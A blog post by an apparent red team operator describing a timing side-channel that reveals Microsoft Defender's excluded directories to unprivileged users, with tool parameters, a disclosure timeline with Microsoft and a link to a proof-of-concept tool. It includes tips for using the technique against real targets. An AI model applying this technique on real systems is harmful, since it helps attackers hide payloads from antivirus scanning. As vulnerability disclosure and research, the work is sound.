Leaking Microsoft Defender’s exclusions using a timing oracle
Around January 2022, the fact that unprivileged users were able to enumerate Microsoft Defender’s exclusion rules gained notoriety. A little more than a month later, Microsoft silently fixed the issue. Because the vulnerability didn’t meet Microsoft’s thresholds, it never received a CVE and might have flown under the radar of the not-so-diligent security professionals.
Why is this a problem in the first place? Adversaries with low-privileged access to a system running Defender might place or name their payloads according to the EDR’s exclusion criteria, ultimately bypassing this first line of defense with little effort. Therefore, most endpoint protection solutions will require local administrator rights for a user to view the currently active exclusion set. Hence, being able to enumerate an AV/EDR exclusion list as a non-administrator is a valuable capability for a threat actor when targeting a system with low-privileged credentials.
As a Red Team operator, I am constantly faced with situations where disabling, deceiving, or bypassing local security agents is a must. Thus, finding clever ways to perform those tasks is a constant exercise. Identifying such techniques is simple and follows the fundamental scientific process of validating hypotheses. For this specific discovery, the hypothesis was the following: — Given a system running Microsoft Defender with all its default features enabled, considering the configured exclusion list contains at least one directory, is the time difference required to write a file to a non-excluded directory compared to the excluded directory measurable?
To prove my theory, I wrote a tool that would, given a list of directories, write a given number of 512 bytes files to them and compare the mean time taken to write a file amongst the provided directories. The tool would also count with a “sensibility” score that would dictate how significant should the time difference be for a directory to be considered excluded from scanning. Once the first version of the tool was coded, I built it, ran it against my system, and … It worked! Given a sample size of 1000 files and a sensibility score of 0.25, my tool was able to identify all the directories listed under Defender’s exclusion list. I was later able to use these same parameters in different targets successfully. However, it is worth noting that these are not guaranteed to work against any system.
The video below demonstrates the proof-of-concept tool successfully enumerating directories in Defender’s exclusion list.
I reported the issue to Microsoft on July 27, 2022. Microsoft acknowledged the report on December 15, 2022. This information disclosure vulnerability might be addressed in a future patch. However, according to the Microsoft team: “there is no defensible security boundary.” Therefore, the fix won’t go into a Patch Tuesday and won’t be assigned a CVE.
The PoC tool is available for educational purposes only at https://github.com/bananabr/timeexception. When using this technique against a real target, I suggest collecting samples from different hours of the day and different system load conditions for more accurate results. Also, adjusting sample size and sensitivity will likely be needed.
Update 02/11/2024
This story was left unpublished in my drafts for quite a while now. Therefore, I decided to test the tool again against my own system to check if it was still viable. It is!
The snippet below shows that with a sample size of 500 and a sensitivity of 20%, I was able once more to list the ~/Documents/RT as a directory excluded from real-time scanning.
